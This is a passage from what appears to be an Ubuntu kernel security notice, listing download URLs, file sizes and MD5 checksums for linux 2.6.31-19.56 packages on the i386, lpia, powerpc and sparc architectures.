http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   128172 821c97524ce74e0685b135140c5261d7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5:   674164 daade678beff67e96da61f42286bb8d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb\n      Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb\n      Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_i386.deb\n      Size/MD5: 28836780 00047de0d649be8b91c813fe7ee482b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb\n      Size/MD5: 11193984 1848c77671f6d9129f990e1a0a9940d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_i386.deb\n      Size/MD5:   743050 af6030dae8f05d7ef583ee7d6f31be8b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   172774 c11dd36baffeccf283ce48e122d7c791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   186104 072e07c277b4f37611b21aad4390ccb0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    28372 82c8b14ef6982a48d3a8459d56ede43c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   292792 6c99c3b65ff7b159af94edf70358cb4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  2400232 94729dcb0c5adb15ded7b3302c4005eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   142004 9e43481b4e46409d8e711a628ce5e40a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   189566 83afe6de56cab613b4f890723a82a6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   148522 b96767af921427e880579659ba7b757a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    35306 a6a1cbe7a75490632f24cad479916315\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     6842 86b286685eabaf8b6d28d3f922249503\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    86058 c014cfa81ab99a01793d25b995c7d75f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    46424 d525bcf1a39f6a21f09d52d24e6a0eb3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:     8916 f9efb7f192c3cc22c14df58803a64dfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    36282 1d843fa9ef5beed8582f2924d0b53bcc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    21660 3ad0b4572c12885957a3b753fc3b9fe3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:  1495010 630f37fe420a74a22b4ca2eba4960999\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    44088 fddf56b0285ec3d0e6fc61e0fe8b86e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    48484 2614a20d6d57892a8789091eeeaa67b3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:   117810 ff004889bca11286287a59c36fa24c0e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb\n      Size/MD5:    14526 4c9cb3d5598c843bf5b90ddf0292d3c1\n\n  lpia architecture (Low Power Intel Architecture):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   198810 76156647956f29c9e519aeac038c63bb\n    http://ports.ubuntu.com/pool/main/l/linux/char-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    32452 9a5dd5fe15dda0be28f7afd966e89af9\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49936 31c4008b50016b2a6c3a90703f2becbb\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    42148 931518b24b123d3749719c35b2b23759\n    http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    45950 297c686f52a35049b3b2c87a96aebf68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    87366 ec3f16cc0aeeef91b8c887ff347b6b0a\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    33750 a29ddd339c071c5b948c96e30f36f650\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   534366 b15b19f3e6c581d22514700dbd6502d8\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   128202 3d0f559a80187074bb210e3dae3bbfa0\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    49732 41abb7e30f0bdac62c5cd064c4b0ac3e\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   295732 12e912ce1f15d580960e7956de0c4ae0\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  4186814 7c18e86a3f5a5a985488ad67718887f9\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5:   674880 5dd2779cd5be613c330b7dc35410f271\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-lpia_2.6.31-19.56_lpia.deb\n      Size/MD5: 28831528 8eaab1870eda62e8ee231e429c361455\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_lpia.deb\n      Size/MD5:   742994 99d2d0609d9032e2810e19c92fc92834\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   172836 8b15eb5579853f45dc49055351df4225\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   186092 0eb0ceb5c23748d829f3e1d7977a35be\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    28366 0301ac544cf27b3dce660787d7575804\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   292736 16e84844c99e73b4e00419c38d78db3d\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  2400366 43dda8f1a10775e382e7a328381265db\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   141998 930123e6b57798468d7085ae9f549150\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   189564 8d6e18aedb4b970a3643207b96589863\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   148506 78efdbf1323c68be564ad06205842cb6\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    35300 054cf95e7af87d6f744b69eb8166f275\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     6828 5dbf32d40e88f471614e5cf286670e8f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    86054 f24e7eaa3608985960e54a9048a24fb6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    46410 80945eba79f53965effd546d23a8560b\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:     8906 e1c6021a615a4363dde2cf4a893fa53b\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    36270 eb2848e19ec2351b9102bc640e546991\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    21660 cfb271e26dfd127871f5d27547e0a7ba\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:  1494736 44113d529e3f4d3828f8719facd86370\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    44068 98817942a8188bd9281def20a1d327bb\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    48474 ebc9e58b5f98182006d6e3bb9c5ce179\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:   117786 9b864dfc32d19a8cf2d61a68894835e9\n    http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb\n      Size/MD5:    14524 9ad51e3871197eb84b193bd9a3b29ec2\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   321488 509ad8549565d0d87fe246df5b26c7af\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   263628 b7028cc16ec749cc2fdd86e985c7bc6a\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58850 3e2f18df29a75debc326e5919c9c13da\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    67040 8fdde64943d01e5c6a372424d3d24a03\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    45914 6a21bb6fc6dce2767be6f974ffdab524\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    51296 4c928d4f04bf96f5cdc5ccf7d3a60c81\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    90684 eac2ea55da023924723593afffbb5d2c\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   105146 c407a156a5e56f284fa682d87d2ed50e\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39492 38f377d5a0bdbbbb642545aa6d7f641c\n    http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    39270 47f890e2a1418595d92858350aa16475\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   580998 825045ff82a442eaf1a21a5448b0cefb\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   626388 b56b5416b642ba57471e6e125b99a32f\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   149292 930001a305b0f78060f3472fe46cde00\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   147332 ef6994c30f19462a7fc0cb7cd8f4dacc\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79750 75c6da2308e05334f89f62917aee5b3d\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    84136 caf2a7e924b03340e579e9bdc0a7ba50\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   402954 9fc3d4860f5c32aff3ac252379938fef\n    http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   342516 5737df8ea2adfc45ecae9d322931187a\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  3813204 3ac91a51b3525bfbb0f6166fc140d7db\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  5193132 54dce7348221bcc93bbc01512d553a16\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   784762 523b94315bff20137df79c5308abd5b7\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5:   801042 2a8e55b23ad4dc09ee3cbb2fdc23cc28\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5:   783708 185ba99656f4fa37874e0241e9f25dbb\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24820746 adc5365726ba88565ad89953707bd012\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb\n      Size/MD5: 25829918 fc82da730c6d730c5a4ac87d30594749\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb\n      Size/MD5: 24656226 7791f88107e97c5419f0e2d2f850c38e\n    http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_powerpc.deb\n      Size/MD5:   728146 1dabe36864839475aab9293825cfc3e4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   271924 8fb200d91f158f9b0eb209df5a5ffcd4\n    http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   294610 317f7d34e3cd0ac823fcc5d48bcc9a7f\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210546 041508a9555e18e2b8b4cab41b26f397\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   216984 845e2e452ef869aa3b39ea47bfa0280b\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    25798 19a7cae7e4f693c269f54dc0f2762f33\n    http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    28984 419926b33e2b573f8d3ccaa5ade657f1\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   314922 83dcb63807ffb50682219b20333c23bc\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   357524 a32753bfca44b1afb9b11f72b25ebb9e\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2027754 9b45ff8446ec0bad5befec2dc3ecdb72\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  2247744 35d212f7569bb03564a7f0294879557f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   213544 3fb9afb7247290ffb3508744ab6cbb9f\n    http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   209776 e42b20eb402cb2a55fea2a80f5cef162\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   210242 78939115c860efacb83481c0687f1a7a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   244856 8fcff5fb05c0921681ec2bb44637c624\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   111834 a6b65e618a3240d51f36f37911d1d7cc\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   131610 dc5625deacbac446e71517f5902376b1\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    49028 ac60e4bf193e7725de6d8999c6231915\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    44082 531b2cbe15ec2f62fe61bd7002b1df02\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     5852 f049a9332d469b247e451868b4f22cce\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     6504 32fb4de3cd714598281c2d4d5d2ee6d6\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    79118 e98cffbfe6f6cbffcfa6dce199dc6c46\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    85190 e648dc2d3e124d68c47d4ec18836097f\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    74318 19b737ad1f43e7be1c6cc7e211085424\n    http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    27228 0b5b4529d140289e616bded832055cbc\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     8538 9010c080bd63660bf529930565d49f62\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:     9818 e909c37d26354ddbdceddc72628d71b3\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    58830 ae6573a0664b5486360156dd6711776c\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    70140 83085dfd5f4bb24ab67dd967e6b609cc\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    23714 86a598e1b13e4d6963475732e7a1097a\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    30804 b382bc0bfffd61156d0f8b3dc90bd307\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1556894 ea2800c85a0115ad2e524a8b4ab4cb91\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:  1509110 e42499f8bdbad020301a11617f6b65a8\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    81698 095ff78875bae0b90edd07ac3b51993d\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    88530 1a36ce88a0c6f7b495c869da15bf9d69\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    64400 8ff9a2aef998409440c1139f3db8c7ee\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:    76990 392faa17f8c688e3856d91fb657eba09\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   141540 636e6d1827591a3aa46b82d7dc0b8ab6\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb\n      Size/MD5:   151356 0f39f4d13770ceab049be6fb9c83fc16\n\n  sparc architecture (Sun SPARC/UltraSPARC):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   139430 14f825a3334b18614059312527002767\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    70106 6dde178febff58a546142209374e1616\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    46510 64b0be995ce3d697a84cd3b0665ffe68\n    http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    93974 28048300aba15f2a3937723bc0afc5cd\n    http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   588788 c17e7feb3442296b7ed93c92cb988625\n    http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:   148426 6f429deb9df760daf28c04ad93ea6758\n    http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:    75862 6f382de52d9e1b52611c70a703895e5d\n    http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb\n      Size/MD5:  2892370 ec9440bb8ee05a7ac071992c5711139f\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5:   601506 1b56c59b3df953a640760b876d752465\n    http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5:   600680 166e5056f971d5fa031230c1af67d028\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64-smp_2.6.31-19.56_sparc.deb\n      Size/MD5: 20496992 6ebab55c96d6be71ffb8c3a493d31a74\n    http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb\n      Size/MD5: 